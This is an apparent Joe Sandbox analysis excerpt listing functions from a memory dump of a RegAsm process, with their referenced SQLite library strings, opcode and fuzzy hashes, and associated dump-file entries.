Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: WITHOUT ROWID$CREATE TABLE %Q.'%q_%q'(%s)%s$fts5: error creating shadow table %q_%s: %s
API String ID: 0-1971204597
Opcode ID: 8a25a60c07ba6908b9c79a88afca22f7b3f1f2eeeeb5a53111a64d74c83838ed
Instruction ID: ad24711f469eb533a5a127927faa4e6d39f51d0c3b238a24eb92522a18361b49
Opcode Fuzzy Hash: 8a25a60c07ba6908b9c79a88afca22f7b3f1f2eeeeb5a53111a64d74c83838ed
Instruction Fuzzy Hash: EC11A2B1A04150EFDB02AF68DC8CA2BB7BCFB84746F584029F949D7641DB31C914DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C32380 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C3240B
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C323FC
misuse, xrefs: 19C32406

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: c13e9dfa36ec666d4bb7ccaafe3c36fcff72f7a18ba3a0b206e8000cf76a9910
Instruction ID: c8727cb7c7ec62d088cea213b329f06c13b59f1ce9ae8bd0a5a8989aaf39ae88
Opcode Fuzzy Hash: c13e9dfa36ec666d4bb7ccaafe3c36fcff72f7a18ba3a0b206e8000cf76a9910
Instruction Fuzzy Hash: 1311BE75204202DFDB14CF0CEC80E9ABBA9AF88315F95449CF681CB292D731E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 19CD1F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 19CD1F92

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 4026c9c436f84aa068cde9cda628abba0f181199475dadb67889ad7d8674a2dc
Instruction ID: e2b7d4f8439aedf97cc08661ac9ccc06ca3dc670aec2d007151168a02b6acaed
Opcode Fuzzy Hash: 4026c9c436f84aa068cde9cda628abba0f181199475dadb67889ad7d8674a2dc
Instruction Fuzzy Hash: 680104726092116FDB189A54AC00B9B7BD5EF81730F28466CF5D5962D0EB71E80183E2

Uniqueness

Uniqueness Score: -1.00%

Function 19C31DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C31E63
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C31E53
misuse, xrefs: 19C31E59

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: a40096f228533b19e3d7342d2456282645a944b57cf8b3b5ece6d483cf0b2077
Instruction ID: 69a5615ff56915b7a6be78f961a1791a15f24cea82983e22acfbdf34a2da654c
Opcode Fuzzy Hash: a40096f228533b19e3d7342d2456282645a944b57cf8b3b5ece6d483cf0b2077
Instruction Fuzzy Hash: EC11E3346085909FD304CE29E84CA57BBB8BF82786F4C0468E085CB362C336E605C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C4F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19C4F105

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: d72503f014778adbf44148333372ef0cd7646a8e6ae1074bfb07b0a188f89570
Instruction ID: 2797d6bc6f442f8fd329bf05478b7a643ad42da3ca851c215ff8ee3ccebc622e
Opcode Fuzzy Hash: d72503f014778adbf44148333372ef0cd7646a8e6ae1074bfb07b0a188f89570
Instruction Fuzzy Hash: EE019E3B3042425FD3218A6EFC84F97B7E8EBC4621F19046AF5EDC3201D661A88583A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C50D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19C50D87

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: ed0a4e744a25a43533ccfabb2b9ad8721b40905e553a776eb71507675be6313f
Instruction ID: 0498586115f525c89c046fdb65c01faaedf02b1ab73e8ec708a4e9272fedbb3b
Opcode Fuzzy Hash: ed0a4e744a25a43533ccfabb2b9ad8721b40905e553a776eb71507675be6313f
Instruction Fuzzy Hash: 81016976204200AFE350DA5AFC80F42B7E9EB88724F594468F68DD7280E6B2BC4587A4

Uniqueness

Uniqueness Score: -1.00%

Function 19C2EF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C2EFB5
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C2EFA6
misuse, xrefs: 19C2EFB0

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 55042b79a5a25cb673456c12b860c464a008d06f0d3926b375670ee7af94e96a
Instruction ID: 48fd41187833bf1e3495ffa3cfe4fdc3171a1b3c8dc3447042788850d934b18e
Opcode Fuzzy Hash: 55042b79a5a25cb673456c12b860c464a008d06f0d3926b375670ee7af94e96a
Instruction Fuzzy Hash: A701B5B1D056619FD702DF18E848B4B7BE5AF81705F4D4028E588AB341C331E845CBD7

Uniqueness

Uniqueness Score: -1.00%

Function 19C99180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 19C99192

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: 28909ef64fbde397952541f30ea357c5cbe4cf0f026749805a3bb332035adc9c
Instruction ID: 09af1887e4c9791c062b6abf67585f81513cb322267fca048e3bc02de6ffd7f9
Opcode Fuzzy Hash: 28909ef64fbde397952541f30ea357c5cbe4cf0f026749805a3bb332035adc9c
Instruction Fuzzy Hash: 79F02733A082523BD70086B9FC80B86EBD9BB40560F9D8625E48C92144D712BCA143D1

Uniqueness

Uniqueness Score: -1.00%

Function 19C47F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19C47F76

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: adbb28d2ad593e2780d2857034cdeec23c8b3f7d6e98e558968502680f17ab6c
Instruction ID: 33ce8fa15e008d93aedded2ca519d4969d5b4861e04755aa6ecc3500a95ecbe4
Opcode Fuzzy Hash: adbb28d2ad593e2780d2857034cdeec23c8b3f7d6e98e558968502680f17ab6c
Instruction Fuzzy Hash: E4F02B7B70430287E7005F18FC01B89B7D5AFD0311FAD4135F8849B180EB60E88587B1

Uniqueness

Uniqueness Score: -1.00%

Function 19D26B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D26B5E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D26B50
cannot open file, xrefs: 19D26B59

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: 2e6e187fdde7a61d8c6f35b9370281b914e1813fbb53f19c6fffbb941d50cd14
Instruction ID: eed686b913ac61a7e85ce20bed768fe4197ffd181e775746b5444001ebbb9acc
Opcode Fuzzy Hash: 2e6e187fdde7a61d8c6f35b9370281b914e1813fbb53f19c6fffbb941d50cd14
Instruction Fuzzy Hash: 74B09B5555414037D701A654EC01FD67C205790501FDDD864B145B7695D455C0508551

Uniqueness

Uniqueness Score: -1.00%

Function 19D5C1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D5C1FE
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D5C1F0
misuse, xrefs: 19D5C1F9

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 3fda3ef5d2c0002ea715a946619b939c35b8ed585430b1a1093891f0b2ab9613
Instruction ID: 03f0801796c7eada1eb6df3442e85ad398ed25c4fefc2fa912cb9ee164ea7e19
Opcode Fuzzy Hash: 3fda3ef5d2c0002ea715a946619b939c35b8ed585430b1a1093891f0b2ab9613
Instruction Fuzzy Hash: 54B02B6801050473CB009200EC40ED56C2007C0303FDCC034B140DF695D42440001541

Uniqueness

Uniqueness Score: -1.00%

Function 19CC8EB0 Relevance: 6.2, APIs: 4, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a32aa4f63478a879c32f0ad44e3c8bedaf97cdd21e05d57d82901d77eff7b09
Instruction ID: 69221a45bcacec94c935f8c8666bce6eccdede69e51807e6d3a5ebe2ca23f953
Opcode Fuzzy Hash: 1a32aa4f63478a879c32f0ad44e3c8bedaf97cdd21e05d57d82901d77eff7b09
Instruction Fuzzy Hash: 465125726043928BD7118E35F8457DBFFE49F49320F4C4AA9E8C5CB282E769D589C362

Uniqueness

Uniqueness Score: -1.00%

Function 19C47DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5724e09253ceb6b26667a2129d2e9822ea3b94fbe2687d002b086f28a44bc201
Instruction ID: b03a5eb7afe9d1135be7f40df644daf6c5b641ba50f762e3af354fefcf3d3ae8
Opcode Fuzzy Hash: 5724e09253ceb6b26667a2129d2e9822ea3b94fbe2687d002b086f28a44bc201
Instruction Fuzzy Hash: B341BE767006019FE314CF58E980A12F7E5FF84324F68856EE98687AA2D772F851CB90

Uniqueness

Uniqueness Score: -1.00%

Function 19C4CAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afbdc02d10adcd1908ea6b2765cab1516a67088c5469712d5526b0a43d377aaf
Instruction ID: f6aade048ca03fc7c117d9cbd74d015cb64873d50367e3d05e314198eac0e692
Opcode Fuzzy Hash: afbdc02d10adcd1908ea6b2765cab1516a67088c5469712d5526b0a43d377aaf
Instruction Fuzzy Hash: C83190B6B053019BD714CF68E840B96B3E4FF84321F18897AE985C76E0E721E954D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C4B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: ad2bd2948525e721b0930213798526194974a0e07e9dac7d1e5e9ba3a06e022f
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: E331AF76604B419FD334CB29F84069EB7E0BF89314F29892DD8DA87A42D731F488C791

Uniqueness

